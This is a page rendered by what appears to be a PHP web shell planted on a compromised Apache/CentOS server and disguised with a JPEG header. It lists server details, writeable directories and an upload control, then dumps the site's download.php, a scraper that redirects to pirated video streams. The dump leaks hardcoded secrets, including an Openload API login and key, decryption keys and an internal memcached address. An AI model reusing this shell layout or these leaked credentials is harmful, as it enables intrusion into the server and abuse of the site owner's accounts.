ÿØÿàJFIFÿÛ„ ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /var/www/html/vidoe.top/proxy/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/html/vidoe.top/proxy/download.php
<?php
$arr_bot_deny = array('googlebot','bingbot','baiduspider','ahrefsbot','semrushbot','seznambot','yoozbot','linkdexbot','mj12bot','seobilitybot','msnbot-media','facebookexternalhit',' mail.ru_bot','musobot','sogou web spider');
foreach ($arr_bot_deny as $val) {
    if(stripos($_SERVER['HTTP_USER_AGENT'],$val)!== false){
        header('HTTP/1.0 403 Forbidden');
        die();
        exit();
    }
}
session_start();
$key = $_GET['key'];
if($key!=$_SESSION['key_download']){
    echo 'Sorry, the session has ended! <a href="https://www.123vid.net">Click here</a> for go back site!';
    exit();
}
include 'Mobile_Detect.php';
$detect = new Mobile_Detect;
require '../lib/aes_decrypt.class.php';
function str_encode($data,$pwd)
{
    $x = 0;
    $a = 0;
    $j = 0;
    $Zcrypt = '';
    $pwd_length = strlen($pwd);
    for ($i = 0; $i < 255; $i++) {
        $key[$i] = ord(substr($pwd, ($i % $pwd_length)+1, 1));
        $counter[$i] = $i;
    }
    for ($i = 0; $i < 255; $i++) {
        $x = ($x + $counter[$i] + $key[$i]) % 256;
        $temp_swap = $counter[$i];
        $counter[$i] = $counter[$x];
        $counter[$x] = $temp_swap;
    }
    for ($i = 0; $i < strlen($data); $i++) {
        $a = ($a + 1) % 256;
        $j = ($j + $counter[$a]) % 256;
        $temp = $counter[$a];
        $counter[$a] = $counter[$j];
        $counter[$j] = $temp;
        $k = $counter[(($counter[$a] + $counter[$j]) % 256)];
        $Zcipher = ord(substr($data, $i, 1)) ^ $k;
        $Zcrypt .= chr($Zcipher);
    }
    return $Zcrypt;
}
function decodeCryptZingTV($text){
    $key = 'f_pk_ZingTV_1_@z';
    $iv = 'f_iv_ZingTV_1_@z';
    if($text != ''){
        $cipher = mcrypt_module_open(MCRYPT_RIJNDAEL_128, '', MCRYPT_MODE_CBC, '');
        $iv_size = mcrypt_enc_get_iv_size($cipher);
        if(mcrypt_generic_init($cipher, $key, $iv) != -1){
            $char = '';
            for($i=0; $i<strlen($text);$i+=2){
                $char .= chr(hexdec($text{$i}.$text{($i+1)}));
            }
            $cipherText = mdecrypt_generic($cipher,$char);
            mcrypt_generic_deinit($cipher);
            return $cipherText;
        }else{
            return false;
        }
    }
}
/*if(!function_exists (hex2bin)){
    function hex2bin($hexdata) {
        $bindata = '';
        for ($i=0;$i<strlen($hexdata);$i+=2) {
            $bindata .= chr(hexdec(substr($hexdata,$i,2)));
        }
        return $bindata;
    }
}*/

function curl($url) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    $head[] = "Connection: keep-alive";
    $head[] = "Keep-Alive: 300";
    $head[] = "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7";
    $head[] = "Accept-Language: en-us,en;q=0.5";
    curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36');
    curl_setopt($ch, CURLOPT_HTTPHEADER, $head);
    //curl_setopt($ch, CURLOPT_REFERER, 'http://www.phimmoi.net');
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
    curl_setopt($ch, CURLOPT_TIMEOUT, 60);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 60);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
    curl_setopt($ch, CURLOPT_HTTPHEADER, array('Expect:'));
    $page = curl_exec($ch);
    curl_close($ch);
    return $page;
}
function post($url,$data) {
    $header[0] = "Accept: text/xml,application/xml,application/xhtml+xml,";
    $header[0] .= "text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5";
    $header[] = "Cache-Control: max-age=0";
    $header[] = "Connection: keep-alive";
    $header[] = "Keep-Alive: 300";
    $header[] = "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7";
    $header[] = "Accept-Language: en-us,en;q=0.5";
    $header[] = "Pragma: "; // browsers keep this blank.
    $user_agent = 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36';
    $process = curl_init($url);
    curl_setopt($process, CURLOPT_HTTPHEADER, $header);
    curl_setopt($process, CURLOPT_REFERER, 'http://www.anivn.com');
//curl_setopt($process, CURLOPT_HEADER, 1);
    curl_setopt($process, CURLOPT_USERAGENT, $user_agent);
    //curl_setopt($process, CURLOPT_COOKIEFILE, 'cookies.txt');
    // curl_setopt($process, CURLOPT_COOKIEJAR, 'cookies.txt');
    curl_setopt($process, CURLOPT_ENCODING , 'gzip');
    curl_setopt($process, CURLOPT_TIMEOUT, 10);
//if ($this->proxy) curl_setopt($process, CURLOPT_PROXY, $this->proxy);
    curl_setopt($process, CURLOPT_POSTFIELDS, $data);
    curl_setopt($process, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($process, CURLOPT_SSL_VERIFYHOST, FALSE);
    curl_setopt($process, CURLOPT_SSL_VERIFYPEER, FALSE);
    curl_setopt($process, CURLOPT_FOLLOWLOCATION, 0);
    curl_setopt($process, CURLOPT_POST, 1);
    $return = curl_exec($process);
    curl_close($process);
    return $return;
}
function json_decode_nice($json, $assoc = TRUE){
    $json = str_replace(array("\n","\r"),"\\n",$json);
    $json = preg_replace('/([{,]+)(\s*)([^"]+?)\s*:/','$1"$3":',$json);
    $json = preg_replace('/(,)\s*}$/','}',$json);
    return json_decode($json,$assoc);
}
$url = $_GET['url'];
$url =  str_encode(hex2bin($url),'ngocgiac');
$title = $_GET['title'];
$pos1 = strpos($url,'phimmoi.net');
$pos2 = strpos($url,'bilutv.com');
$pos3 = strpos($url,'tv.zing.vn');
$pos4 = strpos($url,'vung.tv');
$pos5 = strpos($url,'anivn.com');
$pos6 = strpos($url,'anime47.com');
$pos7 = strpos($url,'phimbathu.com');
$pos8 = strpos($url,'drive.google.com');
$pos9 = strpos($url,'youtube.com');
$pos10 = strpos($url,'openload.co');
$pos11 = strpos($url,'opendrive.com');

if($pos11!==false){
    $arr_tmp_play = explode('/',$url);
    $id_opendrive = $arr_tmp_play[count($arr_tmp_play)-1];
    $url = 'https://web.opendrive.com/api/v1/download/file.json/'.$id_opendrive.'';
    header('Location: '.$url.'?title='.$title.'[123Vid.Net]');
    exit();
}
if($pos10!==false){
    preg_match('#embed\/(.*?)\/#is',$url,$match);
    $api_file = $match[1];
    $api_login = '4fc4df8bd18528db';
    $api_pass = 'CaoFU_G4';
    $content1 = curl('https://api.openload.co/1/file/dlticket?file='.$api_file.'&login='.$api_login.'&key='.$api_pass);
    $arr1 = json_decode($content1,true);
    if($arr1['captcha_url']!='') {
        echo '<form action="" method="post" name="post" id="form1"><input type="hidden" name="api_file" value="'.$api_file.'"><input type="hidden" name="ticket" value="'.$arr1['ticket'].'"><img src="'.$arr1['captcha_url'].'">Captcha: <input type="text" value="" name="captcha_txt" /> <input type="submit" name="bsubmit" value="Download" /></form>';
        if(isset($_POST['captcha_txt'])) {;
            $content2 = curl('https://api.openload.co/1/file/dl?file=' . $_POST['api_file'] . '&ticket=' . $_POST['ticket'] . '&captcha_response=' . $_POST['captcha_txt']);
            $arr2 = json_decode($content2,true);
            header('Location: '.$arr2['result']['url']);
            exit();
        }

    }else{
        $url_h  = 'https://openload.co/f/'.$api_file.'/';
        header('Location: '.$url_h);
        exit();
    }

}

if($pos9!==false){
    $memcache = new Memcache;
    $memcache->connect('46.249.32.55', 11211) or die ("Sorry, could not connect memcached! . We're working on getting this fixed as soon as we can.");
    $key_url = md5($url);
    $cache_show_source = $memcache->get($key_url);
    if($cache_show_source){
        $show_source = $cache_show_source['show_source'];
        $default_res = $cache_show_source['default_res'];
    }else {
        $arr = explode('?v=', trim($url));
        $my_id = $arr[1];
        $my_video_info = 'http://www.youtube.com/get_video_info?video_id=' . $my_id . '&asv=3&el=detailpage&hl=en_US';
        $my_video_info = curl($my_video_info);
        parse_str($my_video_info);
        if (isset($url_encoded_fmt_stream_map)) {
            $my_formats_array = explode(',', $url_encoded_fmt_stream_map);
            foreach ($my_formats_array as $key => $format) {
                parse_str($format);
                $avail_formats[$key]['itag'] = $itag;
                $avail_formats[$key]['quality'] = $quality;
                $type = explode(';', $type);
                $avail_formats[$key]['type'] = $type[0];
                $avail_formats[$key]['url'] = urldecode($url) . '&signature=' . $sig;
            }
            $show_source = '';
            if ($detect->isMobile() or $detect->isTablet()) {
                foreach ($avail_formats as $key => $val) {
                    $val['url'] = preg_replace("/[^\/]+\.googlevideo\.com/", "redirector.googlevideo.com", $val['url']);
                    if ($val['itag'] == '18') {
                        $show_source = '<source src="' . $val['url'] . '" type="video/mp4" data-res="360p"/>';
                    }
                }
                $default_res = '360p';
            }else {
                foreach ($avail_formats as $key => $val) {
                    $val['url'] = preg_replace("/[^\/]+\.googlevideo\.com/", "redirector.googlevideo.com", $val['url']);
                    if ($val['itag'] == '22') {
                        $show_source .= '<source src="' . $val['url'] . '" type="video/mp4" data-res="720p"/>';
                    }
                    if ($val['itag'] == '18') {
                        $show_source .= '<source src="' . $val['url'] . '" type="video/mp4" data-res="360p"/>';
                    }
                }
                $default_res = '720p';
            }
            if($show_source!='') {
                $result['show_source'] = $show_source;
                $result['default_res'] = $default_res;
                $memcache->set($key_url, $result, MEMCACHE_COMPRESSED, 3600);
            }
        }
    }
}
if($pos8!==false){
    $memcache = new Memcache;
    $memcache->connect('46.249.32.55', 11211) or die ("Sorry, could not connect memcached! . We're working on getting this fixed as soon as we can.");
    $key_url = md5($url.'b');
    $cache_show_source = $memcache->get($key_url);
    $show_source = '';
    if($cache_show_source){
        $file = $cache_show_source;
    }else {
        $tmp = explode("file/d/", $url);
        $tmp2 = explode("/", $tmp[1]);
        $id = $tmp2[0];
        if($id==''){
            $parts = parse_url($url);
            parse_str($parts['query'], $query);
            $id =  $query['id'];
        }
        $file = curl('http://portal.uka.edu.vn/logs/drive_api.php?id='.$id);
        $arr = json_decode($file,true);
        $file = $arr['link'];
        $memcache->set($key_url, $file, MEMCACHE_COMPRESSED, 3600);
        $file2 = 'https://www.123vid.net/mp4/'.bin2hex(str_encode($file,'123Vid@Net')).'.mp4';
        header('Location: '.$file2.'?title='.$title.'[123Vid.Net]');
        exit();
    }
}
if($pos7!==false){
    $memcache = new Memcache;
    $memcache->connect('46.249.32.55', 11211) or die ("Sorry, could not connect memcached! . We're working on getting this fixed as soon as we can.");
    $key_url = md5($url);
    $cache_show_source = $memcache->get($key_url);
    if($cache_show_source){
        $show_source = $cache_show_source['show_source'];
        $default_res = $cache_show_source['default_res'];
    }else {
        define("key", "phimbathu.com4590481877");
        $arr_url2 = explode('-',$url);
        $id_phim = intval(str_replace('.html', '', $arr_url2[count($arr_url2) - 1]));
        $content1 = curl($url);
        preg_match('#var linkPlay \= \"(.*?)\"\;#is', $content1, $match1);
        $ajax_url = 'http://phimbathu.com'.$match1[1];
        $content2 = curl($ajax_url);
        $arr_source = json_decode($content2,true);
        $link_encode = '';
        foreach ($arr_source as $key=>$val){
            if($val[0]['type']=='drive'){
                $link_encode = $val[0]['file'];
            }
        }
        $link_decode = GibberishAES::dec($link_encode, constant("key") . $id_phim);
        preg_match_all('#file\/d\/(.*?)\/#is',$link_decode,$match_all);
        $id = $match_all[1][count($match_all[1])-1];
        $show_source = '';
        $file = curl('http://212.237.53.63/proxy/drive_api.php?id='.$id);
        $arr = json_decode($file,true);
        $show_source = '<source src="' . trim($arr['link']) . '" type="'.$arr['type'].'" data-res="720p"/>';
        $default_res = '720p';
        if($arr['type']=='video/x-matroska') {
            $show_source = '<source src="' . trim($arr['link']) . '" type=\''.$arr['type'].' ; codecs="theora, vorbis"\' data-res="720p"/><p>Please use Chrome Browser for play this video!</p>';
            $default_res = '720p';
        }
        if($arr['link']!='') {
            $result['show_source'] = $show_source;
            $result['default_res'] = $default_res;
            $memcache->set($key_url, $result, MEMCACHE_COMPRESSED, 3600);
        }
    }
}
if($pos6!==false){

    $memcache = new Memcache;
    $memcache->connect('46.249.32.55', 11211) or die ("Sorry, could not connect memcached! . We're working on getting this fixed as soon as we can.");
    $key_url = md5($url);
    $cache_show_source = $memcache->get($key_url);
    if($cache_show_source){
        $show_source = $cache_show_source['show_source'];
        $default_res = $cache_show_source['default_res'];
    }else {
        require '../lib/cryptojs-aes/cryptojs-aes.php';
        $content = curl('http://hiu.vn/danh-ba/application/hooks/helps/run.php?url=' . $url);
        preg_match_all('#drive\.google\.com\/file\/d\/(.*?)\/view#is',$content,$match);
        $link1 = 'https://drive.google.com/file/d/'.$match[1][count($match[1])-1].'/view';
        $link2 = '';
        if(!is_null($match[1][count($match[1])-2])) {
            $link2 = 'https://drive.google.com/file/d/'.$match[1][count($match[1])-2].'/view';
        }
        $link3 = '';
        if(!is_null($match[1][count($match[1])-3])) {
            $link3 = 'https://drive.google.com/file/d/'.$match[1][count($match[1])-3].'/view';
        }
        $content = curl('http://hiu.vn/danh-ba/application/hooks/helps/post.php?url='.$link1.'&ref='.$url);

        $show_source = '';
        if (!is_null($content)) {
            $content = base64_decode($content);
            $content = cryptoJsAesDecrypt('chieunaylathuhai', $content);//https://drive.google.com/uc?export=download&id=0B3sDIfFrXDx_VGdSR2ExVmxzR1U
            $arr = json_decode($content, true);
            if($arr['link']['error']!=''){
                if($link2!='') {
                    $content = curl('http://hiu.vn/danh-ba/application/hooks/helps/post.php?url=' . $link2.'&ref='.$url);
                    $content = base64_decode($content);
                    $arr = cryptoJsAesDecrypt('chieunaylathuhai', $content);
                    $arr = json_decode($arr, true);
                }
                if($arr['link']['error']!=''){
                    if($link3!='') {
                        $content = curl('http://hiu.vn/danh-ba/application/hooks/helps/post.php?url=' . $link3.'&ref='.$url);
                        $content = base64_decode($content);
                        $arr = cryptoJsAesDecrypt('chieunaylathuhai', $content);
                        $arr = json_decode($arr, true);
                    }
                }
            }
            if(is_null($arr['link']['error'])) {
                if ($detect->isMobile() or $detect->isTablet()) {
                    foreach ($arr['link'] as $key => $val) {
                        if ($val['label'] == '360p') {
                            $show_source = '<source src="' . urldecode($val['file']) . '" type="video/mp4" data-res="360p"/>';
                        }
                    }
                    $default_res = '360p';
                } else {
                    foreach ($arr['link'] as $key => $val) {
                        $show_source .= '<source src="' . urldecode($val['file']) . '" type="video/mp4" data-res="' . $val['label'] . '"/>';
                    }
                    $default_res = '720p';
                }
                if($show_source!='') {
                    $result['show_source'] = $show_source;
                    $result['default_res'] = $default_res;
                    $memcache->set($key_url, $result, MEMCACHE_COMPRESSED, 3600);
                }
            }else{
                echo '<div class="content" style="color: #ffffff;">
                        <h1 id="unavailable-message" class="message">
                                  We\'re processing this video.
                        </h1>
                        <div id="unavailable-submessage" class="submessage">
                           Please choose video at another server.
                        </div>
                      </div>';
                exit();
            }
        } else {
            exit('Video error, we will fix this soon by soon we can!');
        }
    }


}
if($pos5!==false){
    $memcache = new Memcache;
    $memcache->connect('46.249.32.55', 11211) or die ("Sorry, could not connect memcached! . We're working on getting this fixed as soon as we can.");
    $key_url = md5($url);
    $cache_show_source = $memcache->get($key_url);

    if($cache_show_source){
        $show_source = $cache_show_source['show_source'];
        $default_res = $cache_show_source['default_res'];
    }else {
        $content = curl('http://dauvantay.ischool.vn/curl/get_page_anivn.php?url='.trim($url));
        preg_match('#sources\: \[(.*?)\]\,#is', $content, $match);
        if(!is_null($match[1])) {
            $json = '[' . str_replace(array('file', 'label', 'type', ': ', ', '), array('"file"', '"label"', '"type"', ':', ','), $match[1]) . ']';
            $json = str_replace('},]', '}]', $json);
            $arr = json_decode($json, true);
            if ($detect->isMobile() or $detect->isTablet()) {
                foreach ($arr as $key => $val) {
                    if ($val['label'] == '360p') {
                        $show_source = '<source src="' . $val['file'] . '" type="video/mp4" data-res="' . $val['label'] . '"/>';
                    }
                }
                $default_res = '360p';
            } else {
                foreach ($arr as $key => $val) {
                    $show_source .= '<source src="' . $val['file'] . '" type="video/mp4" data-res="' . $val['label'] . '"/>';
                }
                $default_res = '720p';
            }
        }else{
            preg_match('#docid\=(.*?)\&#is',$content,$match);
            /*$tmp = explode("file/d/", $content);
            $tmp2 = explode("/", $tmp[1]);
            $id = $tmp2[0];*/
            $id = $match[1];

            $file = curl('http://212.237.53.63/proxy/drive_api.php?id='.$id);
            $arr = json_decode($file,true);

            $show_source = '<source src="' . trim($arr['link']) . '" type="'.$arr['type'].'" data-res="720p"/>';
            $default_res = '720p';
            if($arr['type']=='video/x-matroska') {
                $show_source = '<source src="' . trim($arr['link']) . '" type=\''.$arr['type'].' ; codecs="theora, vorbis"\' data-res="720p"/><p>Please use Chrome Browser for play this video!</p>';
                $default_res = '720p';
            }

        }
        if (!is_null($show_source)) {
            $result['show_source'] = $show_source;
            $result['default_res'] = $default_res;
            $memcache->set($key_url, $result, MEMCACHE_COMPRESSED, 3600);
        }
    }

}
if($pos1!==false){
    $memcache = new Memcache;
    $memcache->connect('46.249.32.55', 11211) or die ("Sorry, could not connect memcached! . We're working on getting this fixed as soon as we can.");
    $key_url = md5($url);
    $cache_show_source = $memcache->get($key_url);
    if($cache_show_source){
        $show_source = $cache_show_source['show_source'];
        $default_res = $cache_show_source['default_res'];
    }else {
        define("key", "PhimMoi.Net@");
        $content1 = curl($url);
        preg_match('#episodeinfo-v1\.1\.php(.*?)\"#is', $content1, $match1);
        $url2 = 'http://episode.phimmoi.net/episodeinfo-v1.1.php' . $match1[1];
        $parts = parse_url($url2);
        parse_str($parts['query'], $query);
        $id_epi = $query['episodeid'];
        $content2 = curl($url2);
        if (!is_null($content2)) {
            preg_match('#var _responseJson=\'(.*?)\';#is', $content2, $match2);
            $arr_content = json_decode($match2[1], true);
            $show_source = '';
            if ($detect->isMobile() or $detect->isTablet()) {
                foreach ($arr_content['medias'] as $key => $val) {
                    if ($val['resolution'] == '360') {
                        //$link_decode = GibberishAES::dec($val['url'], constant("key") . $id_epi);
                        $link_decode = $val['url'];
                        $show_source = '<source src="' . $link_decode . '" type="video/mp4" data-res="' . $val['resolution'] . 'p"/>';
                    }
                }
                $default_res = '360p';
            } else {
                foreach ($arr_content['medias'] as $key => $val) {
                    //$link_decode = GibberishAES::dec($val['url'], constant("key") . $id_epi);
                    $link_decode = $val['url'];
                    $show_source .= '<source src="' . $link_decode . '" type="video/mp4" data-res="' . $val['resolution'] . 'p"/>';
                }
                $default_res = '720p';
            }

        }
        if($link_decode!='') {
            $result['show_source'] = $show_source;
            $result['default_res'] = $default_res;
            $memcache->set($key_url, $result, MEMCACHE_COMPRESSED, 3600);
        }

    }
}
if($pos2!==false){
    $memcache = new Memcache;
    $memcache->connect('46.249.32.55', 11211) or die ("Sorry, could not connect memcached! . We're working on getting this fixed as soon as we can.");
    $key_url = md5($url);
    $cache_show_source = $memcache->get($key_url);
    if($cache_show_source){
        $show_source = $cache_show_source['show_source'];
        $default_res = $cache_show_source['default_res'];
    }else {
        define("key", "bilutv.com4590481877");
        $arr_url = explode('_', $url);
        $arr_url2 = explode('-', $arr_url[0]);
        $id_phim = intval(str_replace('.html', '', $arr_url2[count($arr_url2) - 1]));
        $content1 = curl($url);
        preg_match('#\"sources\"\:\[(.*?)\]\,#is', $content1, $match1);
        $arr_content = json_decode('[' . $match1[1] . ']', true);
        $show_source = '';
        $link_decode = GibberishAES::dec($arr_content[0]['file'], constant("key") . $id_phim);
        $tmp = explode("file/d/", $link_decode);
        $tmp2 = explode("/", $tmp[1]);
        $id = $tmp2[0];
        $file = curl('http://212.237.53.63/proxy/drive_api.php?id='.$id);
        $arr = json_decode($file,true);
        $show_source = '<source src="' . trim($arr['link']) . '" type="'.$arr['type'].'" data-res="720p"/>';
        $default_res = '720p';
        if($arr['type']=='video/x-matroska') {
            $show_source = '<source src="' . trim($arr['link']) . '" type=\''.$arr['type'].' ; codecs="theora, vorbis"\' data-res="720p"/><p>Please use Chrome Browser for play this video!</p>';
            $default_res = '720p';
        }
        /*if ($detect->isMobile() or $detect->isTablet()) {
            foreach ($arr_content as $key => $val) {
                if ($val['label'] == '360p') {
                    $link_decode = GibberishAES::dec($val['file'], constant("key") . $id_phim);
                    $show_source = '<source src="' . $link_decode . '" type="video/mp4" data-res="' . $val['label'] . '"/>';
                }
            }
            $default_res = '360p';
        } else {
            foreach ($arr_content as $key => $val) {
                $link_decode = GibberishAES::dec($val['file'], constant("key") . $id_phim);
                $show_source .= '<source src="' . $link_decode . '" type="video/mp4" data-res="' . $val['label'] . '"/>';
            }
            $default_res = '720p';
        }*/
        if($arr['link']!='') {
            $result['show_source'] = $show_source;
            $result['default_res'] = $default_res;
            $memcache->set($key_url, $result, MEMCACHE_COMPRESSED, 3600);
        }
    }
}
if($pos3!==false){
    $memcache = new Memcache;
    $memcache->connect('46.249.32.55', 11211) or die ("Sorry, could not connect memcached! . We're working on getting this fixed as soon as we can.");
    $key_url = md5($url);
    $cache_show_source = $memcache->get($key_url);
    if($cache_show_source){
        $show_source = $cache_show_source['show_source'];
        $default_res = $cache_show_source['default_res'];
    }else {
        $url = 'http://dauvantay.ischool.vn/curl/get_page_zingtv.php?url=' . $url;
        $content = curl($url);
        preg_match('#source\: \"(.*?)\"\,#is', $content, $match);
        $p360 = $match[1];
        $arr = explode('var label720 = "720p(VIP)";', $content);
        preg_match('#video720 \= \"(.*?)\"\;#is', $arr[1], $match2);
        $p720 = '';
        if (!is_null($match2[1])) {
            $p720 = $match2[1];
        }
        preg_match('#video1080 \= \"(.*?)\"\;#is', $arr[1], $match3);
        $p1080 = '';
        if (!is_null($match3[1])) {
            $p1080 = $match3[1];
        }
        $show_source = '';
        if ($detect->isMobile() or $detect->isTablet()) {
            $show_source = '<source src="' . $p360 . '" type="' . $type . '" data-res="360p"/>';
            $default_res = '360p';
        } else {
            $show_source .= '<source src="' . $p360 . '" type="' . $type . '" data-res="360p"/>';
            if (!is_null($p720)) {
                $show_source .= '<source src="' . $p720 . '" type="' . $type . '" data-res="720p"/>';
            }
            if (!is_null($p1080)) {
                $show_source .= '<source src="' . $p1080 . '" type="' . $type . '" data-res="1080p"/>';
            }
            $default_res = '720p';
        }
        $result['show_source'] = $show_source;
        $result['default_res'] = $default_res;
        $memcache->set($key_url, $result, MEMCACHE_COMPRESSED, 3600);
    }

}
if($pos4!==false){
    $memcache = new Memcache;
    $memcache->connect('46.249.32.55', 11211) or die ("Sorry, could not connect memcached! . We're working on getting this fixed as soon as we can.");
    $key_url = md5($url);
    $cache_show_source = $memcache->get($key_url);
    if($cache_show_source){
        $show_source = $cache_show_source['show_source'];
        $default_res = $cache_show_source['default_res'];
    }else{
        $content = curl('http://hiu.vn/danh-ba/application/hooks/curl/get_page_vungtv.php?url='.$url);
        preg_match('#<iframe src="(.*?)?"#is', $content, $match);
        $content2 = curl('http://hiu.vn/danh-ba/application/hooks/curl/get_page_vungtv_detail.php?url='.$match[1]);
        preg_match('#sources\: \'(.*?)\'\,hash#is', $content2, $match);
        $content3 = base64_decode($match[1]);
        $arr = json_decode($content3, true);
        $type = 'video/mp4';
        $show_source = '';
        $label = '360p';
        if (!is_null($arr)) {
            /*if ($detect->isMobile() or $detect->isTablet()) {
                foreach ($arr as $key => $val) {
                    if($val['label']=='360p'){
                        $show_source = '<source src="' . urldecode($val['file']) . '" type="' . $type . '" data-res="' . $val['label'] . '"/>';
                    }
                }
                $default_res = '360p';
            }else {
                foreach ($arr as $key => $val) {
                    if (strpos($content3, '.m3u8') === false) {
                        $show_source .= '<source src="' . urldecode($val['file']) . '" type="' . $type . '" data-res="' . $val['label'] . '"/>';
                    }else{
                        $show_source = '<source src="' . urldecode($val['file']) . '" type="application/x-mpegURL"/>';
                    }
                }
                $default_res = '720p';
            }*/
            $link_decode = $arr[0];
            $tmp = explode("file/d/", $link_decode);
            $tmp2 = explode("/", $tmp[1]);
            $id = $tmp2[0];
            $file = curl('http://212.237.53.63/proxy/drive_api.php?id='.$id);
            $arr2 = json_decode($file,true);
            $show_source = '<source src="' . trim($arr2['link']) . '" type="'.$arr2['type'].'" data-res="720p"/>';
            $default_res = '720p';
            if($arr2['type']=='video/x-matroska') {
                $show_source = '<source src="' . trim($arr2['link']) . '" type=\''.$arr2['type'].' ; codecs="theora, vorbis"\' data-res="720p"/><p>Please use Chrome Browser for play this video!</p>';
                $default_res = '720p';
            }
            $result['show_source'] = $show_source;
            $result['default_res'] = $default_res;
            $memcache->set($key_url, $result, MEMCACHE_COMPRESSED, 3600);
        }else{
            echo '<div class="content" style="color: #ffffff;">
                        <h1 id="unavailable-message" class="message">
                                  We\'re processing this video.
                        </h1>
                        <div id="unavailable-submessage" class="submessage">
                           Please choose video at another server.
                        </div>
                      </div>';
            exit();
        }

    }
}

if($show_source!='') {
    preg_match_all('#source src\="(.*?)"#is',$show_source,$match);
    $link_video = $match[1][0];
    preg_match_all('#data-res\="(.*?)"#is',$show_source,$match1);
    $link360 = '';
    $title360 = '';
    $link720 = '';
    $title720 = '';
    foreach ($match1[1] as $key=>$val){
        if($val=='360p'){
            $link360 = $match[1][$key];
            $title360 = $title.'-'.$val;
        }
        if($val=='720p'){
            $link720 = $match[1][$key];
            $title720 = $title.'-'.$val;
        }
    }
    if($link720!='') {
        header('Location: ' .$link720 . '&title=' . $title720 . '-123Vid.Net');
        exit();
    }else{
        header('Location: ' .$link360 . '&title=' . $title360 . '-123Vid.Net');
        exit();
    }
}else{
    echo 'Sorry, we\'re processing this video! <a href="https://www.123vid.net">Click here</a> for go back site!';
    exit();
}

?>

ZeroDay Forums Mini